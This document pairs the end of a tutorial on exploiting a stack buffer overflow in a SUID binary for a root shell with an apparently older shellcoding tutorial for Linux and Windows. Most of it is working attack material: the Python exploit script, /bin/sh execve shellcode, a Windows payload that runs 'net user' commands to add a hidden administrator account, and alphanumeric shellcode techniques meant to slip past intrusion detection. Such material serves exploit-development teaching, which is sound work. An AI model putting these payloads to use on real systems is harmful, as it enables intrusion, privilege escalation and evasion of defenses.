0032| 0x7fffffffe528 ("AAQAAmAARAAnAASAAoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%"...)
0040| 0x7fffffffe530 ("RAAnAASAAoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA"...)
0048| 0x7fffffffe538 ("AoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%R"...)
0056| 0x7fffffffe540 ("AAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%nA%SA%"...)
[------------------------------------------------------------------------------]

We can clearly see our cyclic pattern on the stack. Let’s find the offset:

gdb-peda$ x/wx $rsp
0x7fffffffe508: 0x41413741

gdb-peda$ pattern_offset 0x41413741
1094793025 found at offset: 104

So RIP is at offset 104. Let’s update our exploit and see if we can overwrite RIP this time:

#!/usr/bin/env python
from struct import *

buf = ""
buf += "A"*104                      # offset to RIP
buf += pack("<Q", 0x424242424242)   # overwrite RIP with 0x0000424242424242
buf += "C"*290                      # padding to keep payload length at 400 bytes

f = open("in.txt", "w")
f.write(buf)

Run it to create an updated in.txt file, and then redirect it into the program within gdb:

gdb-peda$ r < in.txt
Try to exec /bin/sh
Read 400 bytes. buf is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�
No shell for you :(

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x0
RBX: 0x0
RCX: 0x7ffff7b015a0 (<__write_nocancel+7>:  cmp    rax,0xfffffffffffff001)
RDX: 0x7ffff7dd5a00 --> 0x0
RSI: 0x7ffff7ff5000 ("No shell for you :(\nis ", 'A' <repeats 92 times>"\220, \001\n")
RDI: 0x1
RBP: 0x4141414141414141 ('AAAAAAAA')
RSP: 0x7fffffffe510 ('C' <repeats 200 times>...)
RIP: 0x424242424242 ('BBBBBB')
R8 : 0x283a20756f792072 ('r you :(')
R9 : 0x4141414141414141 ('AAAAAAAA')
R10: 0x7fffffffe260 --> 0x0
R11: 0x246
R12: 0x4004d0 (<_start>:    xor    ebp,ebp)
R13: 0x7fffffffe600 ('C' <repeats 48 times>, "|\350\377\377\377\177")
R14: 0x0
R15: 0x0
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x424242424242
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe510 ('C' <repeats 200 times>...)
0008| 0x7fffffffe518 ('C' <repeats 200 times>...)
0016| 0x7fffffffe520 ('C' <repeats 200 times>...)
0024| 0x7fffffffe528 ('C' <repeats 200 times>...)
0032| 0x7fffffffe530 ('C' <repeats 200 times>...)
0040| 0x7fffffffe538 ('C' <repeats 200 times>...)
0048| 0x7fffffffe540 ('C' <repeats 200 times>...)
0056| 0x7fffffffe548 ('C' <repeats 200 times>...)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0000424242424242 in ?? ()

Excellent, we’ve gained control over RIP. Since this program is compiled without NX or stack canaries, we can write our shellcode directly on the stack and return to it. Let’s go ahead and finish it. I’ll be using a 27-byte shellcode that executes execve(“/bin/sh”) found here.

We’ll store the shellcode on the stack via an environment variable and find its address on the stack using getenvaddr:

koji@pwnbox:~/classic$ export PWN=`python -c 'print "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"'`

koji@pwnbox:~/classic$ ~/getenvaddr PWN ./classic
PWN will be at 0x7fffffffeefa

We’ll update our exploit to return to our shellcode at 0x7fffffffeefa:

#!/usr/bin/env python
from struct import *

buf = ""
buf += "A"*104
buf += pack("<Q", 0x7fffffffeefa)

f = open("in.txt", "w")
f.write(buf)

Make sure to change the ownership and permission of classic to SUID root so we can get our root shell:

koji@pwnbox:~/classic$ sudo chown root classic
koji@pwnbox:~/classic$ sudo chmod 4755 classic

And finally, we’ll update in.txt and pipe our payload into classic:

koji@pwnbox:~/classic$ python ./sploit.py
koji@pwnbox:~/classic$ (cat in.txt ; cat) | ./classic
Try to exec /bin/sh
Read 112 bytes. buf is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAp
No shell for you :(
whoami
root

We’ve got a root shell, so our exploit worked. The main gotcha here was that we needed to be mindful of the maximum address size, otherwise we wouldn’t have been able to gain control of RIP. This concludes part 1 of the tutorial.

Part 1 was pretty easy, so for part 2 we’ll be using the same binary, only this time it will be compiled with NX. This will prevent us from executing instructions on the stack, so we’ll be looking at using ret2libc to get a root shell.

Shellcoding for Linux and Windows Tutorial

WARNING: The following text is useful as a historical and basic document on writing shellcodes.

Background Information

  • EAX, EBX, ECX, and EDX are all 32-bit General Purpose Registers on the x86 platform.
  • AH, BH, CH and DH access the upper 16-bits of the GPRs.
  • AL, BL, CL, and DL access the lower 8-bits of the GPRs.
  • ESI and EDI are used when making Linux syscalls.
  • Syscalls with 6 arguments or less are passed via the GPRs.
  • XOR EAX, EAX is a great way to zero out a register (while staying away from the nefarious NULL byte!)
  • In Windows, all function arguments are passed on the stack according to their calling convention.

 

Required Tools

  • gcc
  • ld
  • nasm
  • objdump

 

Optional Tools

  • odfhex.c — a utility created by me to extract the shellcode from «objdump -d» and turn it into escaped hex code (very useful!).
  • arwin.c — a utility created by me to find the absolute addresses of windows functions within a specified DLL.
  • shellcodetest.c — this is just a copy of the c code found  below. it is a small skeleton program to test shellcode.
  • exit.asm hello.asm msgbox.asm shellex.asm sleep.asm adduser.asm — the source code found in this document (the win32 shellcode was written with Windows XP SP1).

Linux Shellcoding

When testing shellcode, it is nice to just plop it into a program and let it run. The C program below will be used to test all of our code.


/*shellcodetest.c*/

char code[] = "bytecode will go here!";
int main(int argc, char **argv)
{
  int (*func)();
  func = (int (*)()) code;
  (int)(*func)();
}


 

Making a Quick Exit

    The easiest way to begin would be to demonstrate the exit syscall due to it’s simplicity. Here is some simple asm code to call exit. Notice the al and XOR trick to ensure that no NULL bytes will get into our code.


;exit.asm
[SECTION .text]
global _start
_start:
        xor eax, eax       ;exit is syscall 1
        mov al, 1       ;exit is syscall 1
        xor ebx,ebx     ;zero out ebx
        int 0x80



Take the following steps to compile and extract the byte code.
steve hanna@1337b0x:~$ nasm -f elf exit.asm
steve hanna@1337b0x:~$ ld -o exiter exit.o
steve hanna@1337b0x:~$ objdump -d exiter

exiter:     file format elf32-i386

Disassembly of section .text:

08048080 <_start>:
 8048080:       b0 01                   mov    $0x1,%al
 8048082:       31 db                   xor    %ebx,%ebx
 8048084:       cd 80                   int    $0x80

The bytes we need are b0 01 31 db cd 80.

Replace the code at the top with:
char code[] = «\xb0\x01\x31\xdb\xcd\x80»;

Now, run the program. We have a successful piece of shellcode! One can strace the program to ensure that it is calling exit.

Saying Hello

For this next piece, let’s ease our way into something useful. In this block of code one will find an example on how to load the address of a string in a piece of our code at runtime. This is important because while running shellcode in an unknown environment, the address of the string will be unknown because the program is not running in its normal address space.


;hello.asm
[SECTION .text]

global _start


_start:

        jmp short ender

        starter:

        xor eax, eax    ;clean up the registers
        xor ebx, ebx
        xor edx, edx
        xor ecx, ecx

        mov al, 4       ;syscall write
        mov bl, 1       ;stdout is 1
        pop ecx         ;get the address of the string from the stack
        mov dl, 5       ;length of the string
        int 0x80

        xor eax, eax
        mov al, 1       ;exit the shellcode
        xor ebx,ebx
        int 0x80

        ender:
        call starter	;put the address of the string on the stack
        db 'hello'


 

steve hanna@1337b0x:~$ nasm -f elf hello.asm
steve hanna@1337b0x:~$ ld -o hello hello.o
steve hanna@1337b0x:~$ objdump -d hello

hello:     file format elf32-i386

Disassembly of section .text:

08048080 <_start>:
 8048080:       eb 19                   jmp    804809b 

08048082 <starter>:
 8048082:       31 c0                   xor    %eax,%eax
 8048084:       31 db                   xor    %ebx,%ebx
 8048086:       31 d2                   xor    %edx,%edx
 8048088:       31 c9                   xor    %ecx,%ecx
 804808a:       b0 04                   mov    $0x4,%al
 804808c:       b3 01                   mov    $0x1,%bl
 804808e:       59                      pop    %ecx
 804808f:       b2 05                   mov    $0x5,%dl
 8048091:       cd 80                   int    $0x80
 8048093:       31 c0                   xor    %eax,%eax
 8048095:       b0 01                   mov    $0x1,%al
 8048097:       31 db                   xor    %ebx,%ebx
 8048099:       cd 80                   int    $0x80

0804809b <ender>:
 804809b:       e8 e2 ff ff ff          call   8048082 
 80480a0:       68 65 6c 6c 6f          push   $0x6f6c6c65


Replace the code at the top with:
char code[] = "\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3\x01\x59\xb2\x05\xcd"\
              "\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe2\xff\xff\xff\x68\x65\x6c\x6c\x6f";

At this point we have a fully functional piece of shellcode that outputs to stdout.
Now that dynamic string addressing has been demonstrated as well as the ability to zero
out registers, we can move on to a piece of code that gets us a shell.


Spawning a Shell

    This code combines what we have been doing so far. This code attempts to set root privileges if they are dropped and then spawns a shell. Note: system(«/bin/sh») would have been a lot simpler right? Well the only problem with that approach is the fact that system always drops privileges.

Remember when reading this code:
    execve (const char *filename, const char** argv, const char** envp);

So, the second two argument expect pointers to pointers. That’s why I load the address of the «/bin/sh» into the string memory and then pass the address of the string memory to the function. When the pointers are dereferenced the target memory will be the «/bin/sh» string.


;shellex.asm
[SECTION .text]

global _start


_start:
        xor eax, eax
        mov al, 70              ;setreuid is syscall 70
        xor ebx, ebx
        xor ecx, ecx
        int 0x80

        jmp short ender

        starter:

        pop ebx                 ;get the address of the string
        xor eax, eax

        mov [ebx+7 ], al        ;put a NULL where the N is in the string
        mov [ebx+8 ], ebx       ;put the address of the string to where the
                                ;AAAA is
        mov [ebx+12], eax       ;put 4 null bytes into where the BBBB is
        mov al, 11              ;execve is syscall 11
        lea ecx, [ebx+8]        ;load the address of where the AAAA was
        lea edx, [ebx+12]       ;load the address of the NULLS
        int 0x80                ;call the kernel, WE HAVE A SHELL!

        ender:
        call starter
        db '/bin/shNAAAABBBB'



steve hanna@1337b0x:~$ nasm -f elf shellex.asm
steve hanna@1337b0x:~$ ld -o shellex shellex.o
steve hanna@1337b0x:~$ objdump -d shellex

shellex:     file format elf32-i386

Disassembly of section .text:

08048080 <_start>:
 8048080:       31 c0                   xor    %eax,%eax
 8048082:       b0 46                   mov    $0x46,%al
 8048084:       31 db                   xor    %ebx,%ebx
 8048086:       31 c9                   xor    %ecx,%ecx
 8048088:       cd 80                   int    $0x80
 804808a:       eb 16                   jmp    80480a2 

0804808c :
 804808c:       5b                      pop    %ebx
 804808d:       31 c0                   xor    %eax,%eax
 804808f:       88 43 07                mov    %al,0x7(%ebx)
 8048092:       89 5b 08                mov    %ebx,0x8(%ebx)
 8048095:       89 43 0c                mov    %eax,0xc(%ebx)
 8048098:       b0 0b                   mov    $0xb,%al
 804809a:       8d 4b 08                lea    0x8(%ebx),%ecx
 804809d:       8d 53 0c                lea    0xc(%ebx),%edx
 80480a0:       cd 80                   int    $0x80

080480a2 :
 80480a2:       e8 e5 ff ff ff          call   804808c 
 80480a7:       2f                      das
 80480a8:       62 69 6e                bound  %ebp,0x6e(%ecx)
 80480ab:       2f                      das
 80480ac:       73 68                   jae    8048116 <ender+0x74>
 80480ae:       58                      pop    %eax
 80480af:       41                      inc    %ecx
 80480b0:       41                      inc    %ecx
 80480b1:       41                      inc    %ecx
 80480b2:       41                      inc    %ecx
 80480b3:       42                      inc    %edx
 80480b4:       42                      inc    %edx
 80480b5:       42                      inc    %edx
 80480b6:       42                      inc    %edx
Replace the code at the top with:

char code[] = "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb"\
	      "\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89"\
	      "\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd"\
	      "\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f"\
	      "\x73\x68\x58\x41\x41\x41\x41\x42\x42\x42\x42";</ender+0x74>
This code produces a fully functional shell when injected into an exploit
and demonstrates most of the skills needed to write successful shellcode. Be
aware though, the better one is at assembly, the more functional, robust,
and most of all evil, one's code will be.



Windows Shellcoding

Sleep is for the Weak!

    In order to write successful code, we first need to decide what functions we wish to use for this shellcode and then find their absolute addresses. For this example we just want a thread to sleep for an allotted amount of time. Let’s load up arwin (found above) and get started. Remember, the only module guaranteed to be mapped into the processes address space is kernel32.dll. So for this example, Sleep seems to be the simplest function, accepting the amount of time the thread should suspend as its only argument.

G:\> arwin kernel32.dll Sleep
arwin - win32 address resolution program - by steve hanna - v.01
Sleep is located at 0x77e61bea in kernel32.dll


;sleep.asm
[SECTION .text]

global _start


_start:
        xor eax,eax
        mov ebx, 0x77e61bea ;address of Sleep
        mov ax, 5000        ;pause for 5000ms
        push eax
        call ebx        ;Sleep(ms);



steve hanna@1337b0x:~$ nasm -f elf sleep.asm; ld -o sleep sleep.o; objdump -d sleep
sleep:     file format elf32-i386

Disassembly of section .text:

08048080 <_start>:
 8048080:       31 c0                   xor    %eax,%eax
 8048082:       bb ea 1b e6 77          mov    $0x77e61bea,%ebx
 8048087:       66 b8 88 13             mov    $0x1388,%ax
 804808b:       50                      push   %eax
 804808c:       ff d3                   call   *%ebx

Replace the code at the top with:
char code[] = "\x31\xc0\xbb\xea\x1b\xe6\x77\x66\xb8\x88\x13\x50\xff\xd3";

When this code is inserted it will cause the parent thread to suspend for five seconds (note: it will then probably crash because the stack is smashed at this point :-D).

 

A Message to say «Hey»

    This second example is useful in the fact that it will show a shellcoder how to do several things within the bounds of windows shellcoding. Although this example does nothing more than pop up a message box and say «hey», it demonstrates absolute addressing as well as the dynamic addressing using LoadLibrary and GetProcAddress. The library functions we will be using are LoadLibraryA, GetProcAddress, MessageBoxA, and ExitProcess (note: the A after the function name specifies we will be using a normal character set, as opposed to a W which would signify a wide character set; such as unicode). Let’s load up arwin and find the addresses we need to use. We will not retrieve the address of MessageBoxA at this time, we will dynamically load that address.

G:\>arwin kernel32.dll LoadLibraryA
arwin - win32 address resolution program - by steve hanna - v.01
LoadLibraryA is located at 0x77e7d961 in kernel32.dll

G:\>arwin kernel32.dll GetProcAddress
arwin - win32 address resolution program - by steve hanna - v.01
GetProcAddress is located at 0x77e7b332 in kernel32.dll

G:\>arwin kernel32.dll ExitProcess
arwin - win32 address resolution program - by steve hanna - v.01
ExitProcess is located at 0x77e798fd in kernel32.dll


;msgbox.asm 
[SECTION .text]

global _start


_start:
	;eax holds return value
	;ebx will hold function addresses
	;ecx will hold string pointers
	;edx will hold NULL

	
	xor eax,eax
	xor ebx,ebx			;zero out the registers
	xor ecx,ecx
	xor edx,edx
	
	jmp short GetLibrary
LibraryReturn:
	pop ecx				;get the library string
	mov [ecx + 10], dl		;insert NULL
	mov ebx, 0x77e7d961		;LoadLibraryA(libraryname);
	push ecx			;beginning of user32.dll
	call ebx			;eax will hold the module handle

	jmp short FunctionName
FunctionReturn:

	pop ecx				;get the address of the Function string
	xor edx,edx
	mov [ecx + 11],dl		;insert NULL
	push ecx
	push eax
	mov ebx, 0x77e7b332		;GetProcAddress(hmodule,functionname);
	call ebx			;eax now holds the address of MessageBoxA
	
	jmp short Message
MessageReturn:
	pop ecx				;get the message string
	xor edx,edx			
	mov [ecx+3],dl			;insert the NULL

	xor edx,edx
	
	push edx			;MB_OK
	push ecx			;title
	push ecx			;message
	push edx			;NULL window handle
	
	call eax			;MessageBoxA(windowhandle,msg,title,type); Address

ender:
	xor edx,edx
	push eax			
	mov eax, 0x77e798fd 		;exitprocess(exitcode);
	call eax			;exit cleanly so we don't crash the parent program
	

	;the N at the end of each string signifies the location of the NULL
	;character that needs to be inserted
	
GetLibrary:
	call LibraryReturn
	db 'user32.dllN'
FunctionName
	call FunctionReturn
	db 'MessageBoxAN'
Message
	call MessageReturn
	db 'HeyN'






[steve hanna@1337b0x]$ nasm -f elf msgbox.asm; ld -o msgbox msgbox.o; objdump -d msgbox

msgbox:     file format elf32-i386

Disassembly of section .text:

08048080 <_start>:
 8048080:       31 c0                   xor    %eax,%eax
 8048082:       31 db                   xor    %ebx,%ebx
 8048084:       31 c9                   xor    %ecx,%ecx
 8048086:       31 d2                   xor    %edx,%edx
 8048088:       eb 37                   jmp    80480c1 

0804808a :
 804808a:       59                      pop    %ecx
 804808b:       88 51 0a                mov    %dl,0xa(%ecx)
 804808e:       bb 61 d9 e7 77          mov    $0x77e7d961,%ebx
 8048093:       51                      push   %ecx
 8048094:       ff d3                   call   *%ebx
 8048096:       eb 39                   jmp    80480d1 

08048098 :
 8048098:       59                      pop    %ecx
 8048099:       31 d2                   xor    %edx,%edx
 804809b:       88 51 0b                mov    %dl,0xb(%ecx)
 804809e:       51                      push   %ecx
 804809f:       50                      push   %eax
 80480a0:       bb 32 b3 e7 77          mov    $0x77e7b332,%ebx
 80480a5:       ff d3                   call   *%ebx
 80480a7:       eb 39                   jmp    80480e2 

080480a9 :
 80480a9:       59                      pop    %ecx
 80480aa:       31 d2                   xor    %edx,%edx
 80480ac:       88 51 03                mov    %dl,0x3(%ecx)
 80480af:       31 d2                   xor    %edx,%edx
 80480b1:       52                      push   %edx
 80480b2:       51                      push   %ecx
 80480b3:       51                      push   %ecx
 80480b4:       52                      push   %edx
 80480b5:       ff d0                   call   *%eax

080480b7 :
 80480b7:       31 d2                   xor    %edx,%edx
 80480b9:       50                      push   %eax
 80480ba:       b8 fd 98 e7 77          mov    $0x77e798fd,%eax
 80480bf:       ff d0                   call   *%eax

080480c1 :
 80480c1:       e8 c4 ff ff ff          call   804808a 
 80480c6:       75 73                   jne    804813b <message+0x59>
 80480c8:       65                      gs
 80480c9:       72 33                   jb     80480fe <message+0x1c>
 80480cb:       32 2e                   xor    (%esi),%ch
 80480cd:       64                      fs
 80480ce:       6c                      insb   (%dx),%es:(%edi)
 80480cf:       6c                      insb   (%dx),%es:(%edi)
 80480d0:       4e                      dec    %esi

080480d1 :
 80480d1:       e8 c2 ff ff ff          call   8048098 
 80480d6:       4d                      dec    %ebp
 80480d7:       65                      gs
 80480d8:       73 73                   jae    804814d <message+0x6b>
 80480da:       61                      popa  
 80480db:       67                      addr16
 80480dc:       65                      gs
 80480dd:       42                      inc    %edx
 80480de:       6f                      outsl  %ds:(%esi),(%dx)
 80480df:       78 41                   js     8048122 <message+0x40>
 80480e1:       4e                      dec    %esi

080480e2 :
 80480e2:       e8 c2 ff ff ff          call   80480a9 
 80480e7:       48                      dec    %eax
 80480e8:       65                      gs
 80480e9:       79 4e                   jns    8048139 <message+0x57>
 </message+0x57></message+0x40></message+0x6b></message+0x1c></message+0x59>
Replace the code at the top with:
char code[] =   "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x37\x59\x88\x51\x0a\xbb\x61\xd9"\
		"\xe7\x77\x51\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x0b\x51\x50\xbb\x32"\
		"\xb3\xe7\x77\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x03\x31\xd2\x52\x51"\
		"\x51\x52\xff\xd0\x31\xd2\x50\xb8\xfd\x98\xe7\x77\xff\xd0\xe8\xc4\xff"\
		"\xff\xff\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x4e\xe8\xc2\xff\xff"\
		"\xff\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x4e\xe8\xc2\xff\xff"\
		"\xff\x48\x65\x79\x4e";

This example, while not useful in the fact that it only pops up a message box, illustrates several important concepts when using windows shellcoding. Static addressing as used in most of the example above can be a powerful (and easy) way to whip up working shellcode within minutes. This example shows the process of ensuring that certain DLLs are loaded into a process space. Once the address of the MessageBoxA function is obtained ExitProcess is called to make sure that the program ends without crashing.

 

Example 3 — Adding an Administrative Account

    This third example is actually quite a bit simpler than the previous shellcode, but this code allows the exploiter to add a user to the remote system and give that user administrative privileges. This code does not require the loading of extra libraries into the process space because the only functions we will be using are WinExec and ExitProcess. Note: the idea for this code was taken from the Metasploit project mentioned above. The difference between the shellcode is that this code is quite a bit smaller than its counterpart, and it can be made even smaller by removing the ExitProcess function!

G:\>arwin kernel32.dll ExitProcess
arwin - win32 address resolution program - by steve hanna - v.01
ExitProcess is located at 0x77e798fd in kernel32.dll

G:\>arwin kernel32.dll WinExec
arwin - win32 address resolution program - by steve hanna - v.01
WinExec is located at 0x77e6fd35 in kernel32.dll


;adduser.asm
[Section .text]

global _start

_start:

jmp short GetCommand

CommandReturn:
    	 pop ebx            	;ebx now holds the handle to the string
   	 xor eax,eax
   	 push eax
    	 xor eax,eax        	;for some reason the registers can be very volatile, did this just in case
  	 mov [ebx + 89],al   	;insert the NULL character
  	 push ebx
  	 mov ebx,0x77e6fd35
  	 call ebx           	;call WinExec(path,showcode)

   	 xor eax,eax        	;zero the register again, clears winexec retval
   	 push eax
   	 mov ebx, 0x77e798fd
 	 call ebx           	;call ExitProcess(0);


GetCommand:
    	;the N at the end of the db will be replaced with a null character
    	call CommandReturn
	db "cmd.exe /c net user USERNAME PASSWORD /ADD && net localgroup Administrators /ADD USERNAMEN"

steve hanna@1337b0x:~$ nasm -f elf adduser.asm; ld -o adduser adduser.o; objdump -d adduser

adduser:     file format elf32-i386

Disassembly of section .text:

08048080 <_start>:
 8048080:       eb 1b                   jmp    804809d 

08048082 :
 8048082:       5b                      pop    %ebx
 8048083:       31 c0                   xor    %eax,%eax
 8048085:       50                      push   %eax
 8048086:       31 c0                   xor    %eax,%eax
 8048088:       88 43 59                mov    %al,0x59(%ebx)
 804808b:       53                      push   %ebx
 804808c:       bb 35 fd e6 77          mov    $0x77e6fd35,%ebx
 8048091:       ff d3                   call   *%ebx
 8048093:       31 c0                   xor    %eax,%eax
 8048095:       50                      push   %eax
 8048096:       bb fd 98 e7 77          mov    $0x77e798fd,%ebx
 804809b:       ff d3                   call   *%ebx

0804809d :
 804809d:       e8 e0 ff ff ff          call   8048082 
 80480a2:       63 6d 64                arpl   %bp,0x64(%ebp)
 80480a5:       2e                      cs
 80480a6:       65                      gs
 80480a7:       78 65                   js     804810e <getcommand+0x71>
 80480a9:       20 2f                   and    %ch,(%edi)
 80480ab:       63 20                   arpl   %sp,(%eax)
 80480ad:       6e                      outsb  %ds:(%esi),(%dx)
 80480ae:       65                      gs
 80480af:       74 20                   je     80480d1 <getcommand+0x34>
 80480b1:       75 73                   jne    8048126 <getcommand+0x89>
 80480b3:       65                      gs
 80480b4:       72 20                   jb     80480d6 <getcommand+0x39>
 80480b6:       55                      push   %ebp
 80480b7:       53                      push   %ebx
 80480b8:       45                      inc    %ebp
 80480b9:       52                      push   %edx
 80480ba:       4e                      dec    %esi
 80480bb:       41                      inc    %ecx
 80480bc:       4d                      dec    %ebp
 80480bd:       45                      inc    %ebp
 80480be:       20 50 41                and    %dl,0x41(%eax)
 80480c1:       53                      push   %ebx
 80480c2:       53                      push   %ebx
 80480c3:       57                      push   %edi
 80480c4:       4f                      dec    %edi
 80480c5:       52                      push   %edx
 80480c6:       44                      inc    %esp
 80480c7:       20 2f                   and    %ch,(%edi)
 80480c9:       41                      inc    %ecx
 80480ca:       44                      inc    %esp
 80480cb:       44                      inc    %esp
 80480cc:       20 26                   and    %ah,(%esi)
 80480ce:       26 20 6e 65             and    %ch,%es:0x65(%esi)
 80480d2:       74 20                   je     80480f4 <getcommand+0x57>
 80480d4:       6c                      insb   (%dx),%es:(%edi)
 80480d5:       6f                      outsl  %ds:(%esi),(%dx)
 80480d6:       63 61 6c                arpl   %sp,0x6c(%ecx)
 80480d9:       67 72 6f                addr16 jb 804814b <getcommand+0xae>
 80480dc:       75 70                   jne    804814e <getcommand+0xb1>
 80480de:       20 41 64                and    %al,0x64(%ecx)
 80480e1:       6d                      insl   (%dx),%es:(%edi)
 80480e2:       69 6e 69 73 74 72 61    imul   $0x61727473,0x69(%esi),%ebp
 80480e9:       74 6f                   je     804815a <getcommand+0xbd>
 80480eb:       72 73                   jb     8048160 <getcommand+0xc3>
 80480ed:       20 2f                   and    %ch,(%edi)
 80480ef:       41                      inc    %ecx
 80480f0:       44                      inc    %esp
 80480f1:       44                      inc    %esp
 80480f2:       20 55 53                and    %dl,0x53(%ebp)
 80480f5:       45                      inc    %ebp
 80480f6:       52                      push   %edx
 80480f7:       4e                      dec    %esi
 80480f8:       41                      inc    %ecx
 80480f9:       4d                      dec    %ebp
 80480fa:       45                      inc    %ebp
 80480fb:       4e                      dec    %esi
</getcommand+0xc3></getcommand+0xbd></getcommand+0xb1></getcommand+0xae></getcommand+0x57></getcommand+0x39></getcommand+0x89></getcommand+0x34></getcommand+0x71>

Replace the code at the top with:
 char code[] =  "\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x59\x53\xbb\x35\xfd\xe6\x77"\
		"\xff\xd3\x31\xc0\x50\xbb\xfd\x98\xe7\x77\xff\xd3\xe8\xe0\xff\xff\xff"\
		"\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73"\
		"\x65\x72\x20\x55\x53\x45\x52\x4e\x41\x4d\x45\x20\x50\x41\x53\x53\x57"\
		"\x4f\x52\x44\x20\x2f\x41\x44\x44\x20\x26\x26\x20\x6e\x65\x74\x20\x6c"\
		"\x6f\x63\x61\x6c\x67\x72\x6f\x75\x70\x20\x41\x64\x6d\x69\x6e\x69\x73"\
		"\x74\x72\x61\x74\x6f\x72\x73\x20\x2f\x41\x44\x44\x20\x55\x53\x45\x52"\
		"\x4e\x41\x4d\x45\x4e";

When this code is executed it will add a user to the system with the specified password, then adds that user to the local Administrators group. After that code is done executing, the parent process is exited by calling ExitProcess.

 

Advanced Shellcoding

    This section covers some more advanced topics in shellcoding. Over time I hope to add quite a bit more content here but for the time being I am very busy. If you have any specific requests for topics in this section, please do not hesitate to email me.

Printable Shellcode

The basis for this section is the fact that many Intrustion Detection Systems detect shellcode because of the non-printable characters that are common to all binary data. The IDS observes that a packet containts some binary data (with for instance a NOP sled within this binary data) and as a result may drop the packet. In addition to this, many programs filter input unless it is alpha-numeric. The motivation behind printable alpha-numeric shellcode should be quite obvious. By increasing the size of our shellcode we can implement a method in which our entire shellcode block in in printable characters. This section will differ a bit from the others presented in this paper. This section will simply demonstrate the tactic with small examples without an all encompassing final example.

Our first discussion starts with obfuscating the ever blatant NOP sled. When an IDS sees an arbitrarily long string of NOPs (0x90) it will most likely drop the packet. To get around this we observe the decrement and increment op codes:



	OP Code        Hex       ASCII
	inc eax        0x40        @
	inc ebx        0x43        C
	inc ecx        0x41        A
	inc edx        0x42        B
	dec eax        0x48        H
	dec ebx        0x4B        K
	dec ecx        0x49        I
	dec edx        0x4A        J

 

It should be pretty obvious that if we insert these operations instead of a NOP sled then the code will not affect the output. This is due to the fact that whenever we use a register in our shellcode we wither move a value into it or we xor it. Incrementing or decrementing the register before our code executes will not change the desired operation.

So, the next portion of this printable shellcode section will discuss a method for making one’s entire block of shellcode alpha-numeric— by means of some major tomfoolery. We must first discuss the few opcodes that fall in the printable ascii range (0x33 through 0x7e).


	sub eax, 0xHEXINRANGE
	push eax
	pop eax
	push esp
	pop esp
	and eax, 0xHEXINRANGE

Surprisingly, we can actually do whatever we want with these instructions. I did my best to keep diagrams out of this talk, but I decided to grace the world with my wonderful ASCII art. Below you can find a diagram of the basic plan for constructing the shellcode.

	The plan works as follows:
		-make space on stack for shellcode and loader
		-execute loader code to construct shellcode
		-use a NOP bridge to ensure that there aren't any extraneous bytes that will crash our code.
		-profit

But now I hear you clamoring that we can’t use move nor can we subtract from esp because they don’t fall into printable characters!!! Settle down, have I got a solution for you! We will use subtract to place values into EAX, push the value to the stack, then pop it into ESP.

Now you’re wondering why I said subtract to put values into EAX, the problem is we can’t use add, and we can’t directly assign nonprintable bytes. How can we overcome this? We can use the fact that each register has only 32 bits, so if we force a wrap around, we can arbitrarily assign values to a register using only printable characters with two to three subtract instructions.

If the gears in your head aren’t cranking yet, you should probably stop reading right now.


	The log awaited ASCII diagram
	1)
	EIP(loader code) --------ALLOCATED STACK SPACE--------ESP

	2)
	---(loader code)---EIP-------STACK------ESP--(shellcode--

	3)
	----loadercode---EIP@ESP----shellcode that was builts---

